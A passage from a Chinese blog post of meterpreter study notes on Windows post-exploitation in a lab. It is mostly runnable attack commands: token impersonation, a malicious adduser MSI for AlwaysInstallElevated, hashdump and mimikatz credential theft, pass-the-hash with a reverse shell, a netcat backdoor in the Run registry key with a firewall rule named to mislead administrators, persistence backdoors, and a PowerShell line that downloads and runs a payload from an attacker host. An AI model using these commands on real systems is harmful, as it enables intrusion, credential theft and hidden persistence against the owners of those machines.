<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306173138736.png" alt="image-20210306173138736"></p>
<p>注意事项：<br>
使用 RunAs 模块进行提权时，系统当前用户须在管理员组或者知道管理员的密码，用户账户控制程序 UAC 设置则没有要求。<br>
使用 RunAs 模块进行提权时，会创建一个可执行文件，为了避免给杀毒软件查杀，该可执行文件（需进行免杀处理）的创建要使用 EXE::Custom 选项。</p>
<h3 id="假冒令牌提权"><a class="markdownIt-Anchor" href="#假冒令牌提权">#</a> 假冒令牌提权</h3>
<p>令牌是系统临时密钥，它允许你在不提供密码或其他凭证的前提下，访问网络和系统资源。这些令牌将持续存在于系统中，除非系统重新启动。一般有两种类型的令牌，一种是 Delegation Tokens，也就是授权令牌，它支持交互式登录（例如远程桌面登陆登录）。还有一种是 Impersonation Tokens，也就是模拟令牌，它是非交互的会话（例如访问文件共享）。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use incognito # 加载窃取令牌模块</span><br><span class="line">list_tokens -u # 查看可用的用户令牌</span><br><span class="line">list_tokens -g # 查看可用的用户组令牌</span><br><span class="line">impersonate_token &#39;NT AUTHORITY\SYSTEM&#39; # 假冒 SYSTEM token</span><br><span class="line">rev2self #返回原始 token</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306173332626.png" alt="image-20210306173332626"></p>
<h3 id="利用-alwaysinstallelevated-提权"><a class="markdownIt-Anchor" href="#利用-alwaysinstallelevated-提权">#</a> 利用 AlwaysInstallElevated 提权</h3>
<p>AlwaysInstallElevated 是一个策略设置。微软允许非授权用户以 SYSTEM 权限运行安装文件 (MSI)，如果用户启用此策略设置，那么黑客利用恶意的 MSI 文件就可以进行管理员权限的提升。</p>
<p>查看 AlwaysInstallElevated 是否被定义</p>
<p>不过利用此方法有个前提条件，需要有两个注册表的键值为 1，我们可以在 cmdshell 下查看 AlwaysInstallElevated 是否被定义</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer &#x2F;v AlwaysInstallElevated</span><br><span class="line">reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer &#x2F;v AlwaysInstallElevate</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306173505093.png" alt="image-20210306173505093"></p>
<p>如上图所示已经开启 AlwaysInstallElevated，如果在组策略里未定义 AlwaysInstallElevated，则会出现 “错误：系统找不到指定的注册表项或值” 的提示，如下图所示：</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306173520115.png" alt="image-20210306173520115"></p>
<p>如果需要开启可以选择以下方法：<br>
1. 打开组策略编辑器（运行框输入 gpedit.msc）<br>
2. 组策略 -&gt; 计算机配置 -&gt; 管理模版 -&gt;Windows 组件 -&gt;Windows Installer-&gt; 永远以高特权进行安装：选择启用<br>
 3. 组策略 -&gt; 用户配置 -&gt; 管理模版 -&gt;Windows 组件 -&gt;Windows Installer-&gt; 永远以高特权进行安装：选择启用</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306173539689.png" alt="image-20210306173539689"></p>
<p>设置完成后对应注册表的位置值会设为 1，开启 AlwaysInstallElevated。</p>
<p>生成 MSI 安装文件</p>
<p>利用 msfvenom 命令生成一个在目标机上增加管理员用户的 MSI 安装文件，这里密码要设置为强密码，否则会报错。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows&#x2F;adduser USER&#x3D;msi PASS&#x3D;Abc123@@ -f msi -o msi.msi</span><br></pre></td></tr></table></figure>
<p>上传并执行 MSI 文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">upload msi.msi c:\\Users\\test # 部分目录由于权限原因可能上传失败</span><br><span class="line">msiexec &#x2F;quiet &#x2F;qn &#x2F;i msi.msi # &#x2F;quiet&#x3D;安装过程中禁止向用户发送消息 &#x2F;qn&#x3D;不使用图形界面 &#x2F;i&#x3D;安装程序</span><br><span class="line">net localgroup administrators</span><br></pre></td></tr></table></figure>
<p>执行成功后查看管理员组发现用户已经添加成功</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306173648978.png" alt="image-20210306173648978"></p>
<p>注意：<br>
由于是 msf 生成的 msi 文件，所以默认会被杀毒软件拦截，需要做好免杀。</p>
<h2 id="窃取-hash-及密码哈希传递"><a class="markdownIt-Anchor" href="#窃取-hash-及密码哈希传递">#</a> 窃取 hash 及密码 &amp; 哈希传递</h2>
<p>窃取 hash 及密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hashdump</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;smart_hashdump</span><br></pre></td></tr></table></figure>
<p>得到的 hash 可以拿去 <span class="exturl" data-url="aHR0cHM6Ly9jbWQ1LmNvbS8=">https://cmd5.com/</span> 解密一下即是用户密码</p>
<p>或者 ophrack 进行解密</p>
<h3 id="mimikatz"><a class="markdownIt-Anchor" href="#mimikatz">#</a> mimikatz</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">msf5:</span><br><span class="line">load mimikatz # 加载 mimikatz 模块</span><br><span class="line">msv # 获取用户和 hash 值</span><br><span class="line">kerberos # 获取内存中的明文密码信息</span><br><span class="line">wdigest # 获取内存中的明文密码信息</span><br><span class="line">mimikatz_command -f a:: # 需要以错误的模块来让正确的模块显示</span><br><span class="line">mimikatz_command -f sekurlsa::searchPasswords # 获取用户密码</span><br><span class="line">mimikatz_command -f samdump::hashes # 执行用户 hash</span><br><span class="line"></span><br><span class="line">msf6：</span><br><span class="line">load kiwi</span><br><span class="line">creds_all</span><br><span class="line">kiwi_cmd sekurlsa::logonpasswords</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306174435101.png" alt="image-20210306174435101"></p>
<h3 id="哈希传递"><a class="markdownIt-Anchor" href="#哈希传递">#</a> 哈希传递</h3>
<p>利用 hashdump 得到用户的 hash 后可利用 psexec 模块进行哈希传递攻击。<br>
使用 psexec 的前提：SMB 服务必须开启，也就是开启 445 端口；Admin$ 可以访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;windows&#x2F;smb&#x2F;psexec</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line">set LHOST 192.168.183.147</span><br><span class="line">set LPORT 443</span><br><span class="line">set RHOST 192.168.183.154</span><br><span class="line">set SMBUSER Administrator</span><br><span class="line">set SMBPASS ccf**4ee:3db**678</span><br><span class="line">set SMBDOMAIN WORKGROUP # 域用户需要设置 SMBDOMAIN</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<h2 id="rdp"><a class="markdownIt-Anchor" href="#rdp">#</a> RDP</h2>
<h3 id="getgui-命令"><a class="markdownIt-Anchor" href="#getgui-命令">#</a> getgui 命令</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">run getgui –h # 查看帮助</span><br><span class="line">run getgui -e # 开启远程桌面</span><br><span class="line">run getgui -u admin -p admin # 添加用户</span><br><span class="line">run getgui -f 6666 -e # 3389 端口转发到 6666</span><br><span class="line">rdesktop 127.0.0.1:6666</span><br></pre></td></tr></table></figure>
<h3 id="enable_rdp-脚本"><a class="markdownIt-Anchor" href="#enable_rdp-脚本">#</a> enable_rdp 脚本</h3>
<p>通过 enable_rdp 脚本将用户添加到远程桌面用户组和管理员用户组</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp #开启远程桌面</span><br><span class="line">run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp USERNAME&#x3D;admin PASSWORD&#x3D;admin # 添加用户</span><br><span class="line">run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp FORWARD&#x3D;true LPORT&#x3D;6667 # 将 3389 端口转发到 666</span><br></pre></td></tr></table></figure>
<h3 id="远程桌面"><a class="markdownIt-Anchor" href="#远程桌面">#</a> 远程桌面</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">enumdesktops # 查看可用的桌面</span><br><span class="line">getdesktop # 获取当前 meterpreter 关联的桌面</span><br><span class="line">setdesktop # 设置 meterpreter 关联的桌面 -h 查看帮助</span><br><span class="line">run vnc # 使用 vnc 远程桌面连接</span><br><span class="line">rdesktop 127.0.0.1:1111 # 需要输入用户名密码连接</span><br><span class="line">rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u 用户名 -p 密码</span><br></pre></td></tr></table></figure>
<h2 id="注册表操作"><a class="markdownIt-Anchor" href="#注册表操作">#</a> 注册表操作</h2>
<p>注册表基本命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">reg –h # 查看帮助</span><br><span class="line">-k 注册表的路径 -v 键的名称 -d 键值</span><br><span class="line">reg enumkey [-k &lt;key&gt;] # 枚举注册表的内容</span><br><span class="line">reg createkey [-k &lt;key&gt;] # 创建注册表项</span><br><span class="line">reg deletekey [-k &lt;key&gt;] # 删除注册表项</span><br><span class="line">reg setval [-k &lt;key&gt; -v &lt;val&gt; -d &lt;data&gt;] # 在注册表里添加内容</span><br><span class="line">reg deleteval [-k &lt;key&gt; -v &lt;val&gt;] # 删除注册表的值</span><br><span class="line">reg queryval [-k &lt;key&gt; -v &lt;val&gt;] # 查询注册表的值</span><br></pre></td></tr></table></figure>
<h3 id="利用注册表添加-nc-后门"><a class="markdownIt-Anchor" href="#利用注册表添加-nc-后门">#</a> 利用注册表添加 nc 后门</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">upload &#x2F;usr&#x2F;share&#x2F;windows-binaries&#x2F;nc.exe C:\\windows\\system32 # 上传 nc 到目标主机</span><br><span class="line">reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run # 枚举注册表 run 下的键值</span><br><span class="line">reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v test_nc -d &#39;C:\windows\system32\nc.exe -Ldp 443</span><br><span class="line">-e cmd.exe&#39; # 设置键值 -v 键的名称 -d 键值</span><br><span class="line">reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v test_nc # 查看 test_nc 的键值</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306175106706.png" alt="image-20210306175106706"></p>
<p>2. 设置防火墙允许通过 443 端口（如果目标主机开启防火墙，没有设置相应的规则可能会导致连接失败。）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">shell</span><br><span class="line">netsh firewall show opmode # 查看防火墙状态</span><br><span class="line">netsh firewall add portopening TCP 443 &quot;网络发现(Pub PSD-Out)&quot; ENABLE ALL # 添加防火墙的规则允许 443 端口通过(这里“网络发现</span><br><span class="line">(Pub PSD-Out)”是规则名称，目的是为了迷惑管理员。)</span><br></pre></td></tr></table></figure>
<p>3. 待目标主机重启后，自启 nc 程序，然后我们利用 nc 连接即</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306175148419.png" alt="image-20210306175148419"></p>
<h2 id="后门植入"><a class="markdownIt-Anchor" href="#后门植入">#</a> 后门植入</h2>
<p>在我们通过漏洞获取到目标主机权限之后，如果目标主机主机重启亦或是管理员发现并修补了漏洞，那么我们就会失去对服务器的控制权，所以我们需要通过植入后门来维持权限，前面说的 nc 后门就是其中一种，另外一般还有 Persistence 和 Metsvc</p>
<h3 id="persistence通过启动项安装"><a class="markdownIt-Anchor" href="#persistence通过启动项安装">#</a> Persistence (通过启动项安装)</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">run persistence –h # 查看帮助</span><br><span class="line">run persistence -X -i 5 -p 3333 -r 本地IP</span><br><span class="line">run persistence -U -i 5 -p 3333 -r 本地IP -L c:\\Windows\\System32</span><br><span class="line">-X：设置后门在系统启动后自启动。该方式会在 HKLM\Software\Microsoft\Windows\CurrentVersion\Run 下添加注册表信息。由于权限原因会导</span><br><span class="line">致添加失败，后门无法启动。因此在非管理员权限下，不推荐使用该参数</span><br><span class="line">-U：设置后门在用户登录后自启动。该方式会在 HKCU\Software\Microsoft\Windows\CurrentVersion\Run 下添加注册表信息</span><br><span class="line">-L：后门传到远程主机的位置默认为%TEMP%</span><br><span class="line">-i：设置反向连接间隔时间为 5 秒</span><br><span class="line">-p：设置反向连接的端口号</span><br><span class="line">-r：设置反向连接的 ip 地址</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306180420630.png" alt="image-20210306180420630"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306180507815.png" alt="image-20210306180507815"></p>
<p>靶机被成功植入后门</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306181305480.png" alt="image-20210306181305480"></p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">backgroup</span><br><span class="line">use exploit/multi/handler</span><br><span class="line"><span class="built_in">set</span> lhost <span class="number">172</span>.<span class="number">16</span>.<span class="number">10</span>.<span class="number">197</span></span><br><span class="line"><span class="built_in">set</span> lport <span class="number">4444</span></span><br><span class="line"><span class="built_in">set</span> paylod windows/meterpreter/reverse_tcp</span><br><span class="line">exploit 成功获得shell</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306180717910.png" alt="image-20210306180717910"></p>
<h3 id="metsvc通过服务安装一句话需要权限"><a class="markdownIt-Anchor" href="#metsvc通过服务安装一句话需要权限">#</a> Metsvc (通过服务安装) 一句话需要权限</h3>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">run metsvc -h # 查看帮助</span><br><span class="line">run metsvc -A # 自动安装后门</span><br><span class="line">run metsvc -r # 删除后门</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">连接后门</span><br><span class="line">use exploit/multi/handler</span><br><span class="line"><span class="built_in">set</span> payload windows/metsvc_bind_tcp</span><br><span class="line"><span class="built_in">set</span> rhost <span class="number">192</span>.<span class="number">168</span>.<span class="number">183</span>.<span class="number">169</span></span><br><span class="line"><span class="built_in">set</span> lport <span class="number">31337</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<h3 id="powershell-后门"><a class="markdownIt-Anchor" href="#powershell-后门">#</a> Powershell 后门</h3>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/script/web_delivery</span><br><span class="line"><span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line"><span class="built_in">set</span> LHOST <span class="number">192</span>.<span class="number">168</span>.<span class="number">183</span>.<span class="number">147</span></span><br><span class="line"><span class="built_in">set</span> LPORT <span class="number">2334</span></span><br><span class="line"><span class="built_in">set</span> srvport <span class="number">2333</span></span><br><span class="line"><span class="built_in">set</span> uripath /</span><br><span class="line"><span class="built_in">set</span> target <span class="number">5</span></span><br><span class="line">run</span><br><span class="line">在目标设备 <span class="built_in">cmd</span> 上执行以下命令即可反弹</span><br><span class="line">powershell.exe -nop -w hidden -c $z=&quot;<span class="built_in">echo</span> ($env:temp+&#x27;\eJedcsJE.exe&#x27;)&quot;; (new-object</span><br><span class="line">System.<span class="built_in">Net</span>.WebClient).DownloadFile(&#x27;http://<span class="number">192</span>.<span class="number">168</span>.<span class="number">183</span>.<span class="number">147</span>:<span class="number">2333</span>/&#x27;, $z); invoke-item $z</span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/meterpreter%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag"><i class="ic i-tag"></i> meterpreter学习笔记</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2021-05-04 13:53:33" itemprop="dateModified" datetime="2021-05-04T13:53:33+08:00">2021-05-04</time>
  </span>
  <span id="2021/04/21/meterpreter学习笔记总结/" class="item leancloud_visitors" data-flag-title="meterpreter学习笔记" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="chun 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.jpg" alt="chun 支付宝">
        <p>支付宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>chun <i class="ic i-at"><em>@</em></i>Go Forward
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://chungod.github.io/2021/04/21/meterpreter%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E6%80%BB%E7%BB%93/" title="meterpreter学习笔记">http://chungod.github.io/2021/04/21/meterpreter学习笔记总结/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/04/16/Windows%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipev1x5e4j20zk0m8b29.jpg" title="Windows内核提权">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Windows内核提权</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2021/05/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giciukx8a7j20zk0m8aio.jpg" title="upload-labs通关记录">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>upload-labs通关记录</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#meterpreter%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text"> meterpreter 学习笔记总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">2.</span> <span class="toc-text"> 系统命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8-cmd-%E5%91%BD%E4%BB%A4"><span class="toc-number">3.</span> <span class="toc-text"> 常用 cmd 命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#uictl-%E5%BC%80%E5%85%B3%E9%94%AE%E7%9B%98%E9%BC%A0%E6%A0%87"><span class="toc-number">3.1.</span> <span class="toc-text"> uictl 开关键盘 &#x2F; 鼠标</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#execute-%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6"><span class="toc-number">3.2.</span> <span class="toc-text"> execute 执行文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#clearav-%E6%B8%85%E9%99%A4%E6%97%A5%E5%BF%97"><span class="toc-number">3.3.</span> <span class="toc-text"> clearav 清除日志</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">4.</span> <span class="toc-text"> 文件系统命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#timestomp-%E4%BC%AA%E9%80%A0%E6%97%B6%E9%97%B4%E6%88%B3"><span class="toc-number">4.1.</span> <span class="toc-text"> timestomp 伪造时间戳</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E5%91%BD%E4%BB%A4"><span class="toc-number">5.</span> <span class="toc-text"> 网络命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#portfwd-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="toc-number">5.1.</span> <span class="toc-text"> portfwd 端口转发</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#autoroute-%E6%B7%BB%E5%8A%A0%E8%B7%AF%E7%94%B1"><span class="toc-number">5.2.</span> <span class="toc-text"> autoroute 添加路由</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#socks-%E4%BB%A3%E7%90%86"><span class="toc-number">5.3.</span> <span class="toc-text"> Socks 代理</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">6.</span> <span class="toc-text"> 信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E7%9A%84%E7%A0%B4%E8%A7%A3%E6%A8%A1%E5%9D%97"><span class="toc-number">6.1.</span> <span class="toc-text"> 常用的破解模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%94%AE%E7%9B%98%E8%AE%B0%E5%BD%95"><span class="toc-number">6.2.</span> <span class="toc-text"> 键盘记录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sniffer-%E6%8A%93%E5%8C%85"><span class="toc-number">6.3.</span> <span class="toc-text"> sniffer 抓包</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AA%83%E5%8F%96%E4%BB%A4%E7%89%8C"><span class="toc-number">6.4.</span> <span class="toc-text"> 窃取令牌</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E6%91%84%E5%83%8F%E5%A4%B4"><span class="toc-number">6.5.</span> <span class="toc-text"> 网络摄像头</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%88%AA%E5%B1%8F"><span class="toc-number">6.6.</span> <span class="toc-text"> 截屏</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">7.</span> <span class="toc-text"> 提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#enum_patches-%E6%A8%A1%E5%9D%97"><span class="toc-number">7.1.</span> <span class="toc-text"> enum_patches 模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87-uac-%E6%8F%90%E6%9D%83"><span class="toc-number">7.2.</span> <span class="toc-text"> 绕过 UAC 提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-runas-%E6%8F%90%E6%9D%83"><span class="toc-number">7.3.</span> <span class="toc-text"> 使用 RunAs 提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%81%87%E5%86%92%E4%BB%A4%E7%89%8C%E6%8F%90%E6%9D%83"><span class="toc-number">7.4.</span> <span class="toc-text"> 假冒令牌提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8-alwaysinstallelevated-%E6%8F%90%E6%9D%83"><span class="toc-number">7.5.</span> <span class="toc-text"> 利用 AlwaysInstallElevated 提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AA%83%E5%8F%96-hash-%E5%8F%8A%E5%AF%86%E7%A0%81%E5%93%88%E5%B8%8C%E4%BC%A0%E9%80%92"><span class="toc-number">8.</span> <span class="toc-text"> 窃取 hash 及密码 &amp; 哈希传递</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz"><span class="toc-number">8.1.</span> <span class="toc-text"> mimikatz</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%93%88%E5%B8%8C%E4%BC%A0%E9%80%92"><span class="toc-number">8.2.</span> <span class="toc-text"> 哈希传递</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rdp"><span class="toc-number">9.</span> <span class="toc-text"> RDP</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#getgui-%E5%91%BD%E4%BB%A4"><span class="toc-number">9.1.</span> <span class="toc-text"> getgui 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#enable_rdp-%E8%84%9A%E6%9C%AC"><span class="toc-number">9.2.</span> <span class="toc-text"> enable_rdp 脚本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2"><span class="toc-number">9.3.</span> <span class="toc-text"> 远程桌面</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%93%8D%E4%BD%9C"><span class="toc-number">10.</span> <span class="toc-text"> 注册表操作</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%B7%BB%E5%8A%A0-nc-%E5%90%8E%E9%97%A8"><span class="toc-number">10.1.</span> <span class="toc-text"> 利用注册表添加 nc 后门</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E9%97%A8%E6%A4%8D%E5%85%A5"><span class="toc-number">11.</span> <span class="toc-text"> 后门植入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#persistence%E9%80%9A%E8%BF%87%E5%90%AF%E5%8A%A8%E9%A1%B9%E5%AE%89%E8%A3%85"><span class="toc-number">11.1.</span> <span class="toc-text"> Persistence (通过启动项安装)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#metsvc%E9%80%9A%E8%BF%87%E6%9C%8D%E5%8A%A1%E5%AE%89%E8%A3%85%E4%B8%80%E5%8F%A5%E8%AF%9D%E9%9C%80%E8%A6%81%E6%9D%83%E9%99%90"><span class="toc-number">11.2.</span> <span class="toc-text"> Metsvc (通过服务安装) 一句话需要权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#powershell-%E5%90%8E%E9%97%A8"><span class="toc-number">11.3.</span> 